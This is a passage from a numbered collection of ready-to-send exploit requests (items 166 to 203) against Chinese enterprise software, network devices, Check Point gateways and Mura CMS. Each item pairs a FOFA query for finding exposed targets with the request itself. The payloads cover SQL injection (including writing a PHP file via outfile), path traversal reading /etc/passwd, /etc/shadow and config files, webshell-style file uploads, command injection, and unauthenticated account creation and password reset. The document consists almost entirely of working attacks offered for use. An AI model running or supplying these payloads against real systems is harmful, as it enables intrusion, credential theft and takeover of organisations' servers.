FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 lean value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation installations.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet gets a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit assetsmanager/upload endpoint file upload

1. Run the PoC to obtain the CSRF value and the cookie, then upload a file and request it to get the result:

GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to obtain the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Substitute the __VIEWSTATE and __EVENTVALIDATION values obtained above:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--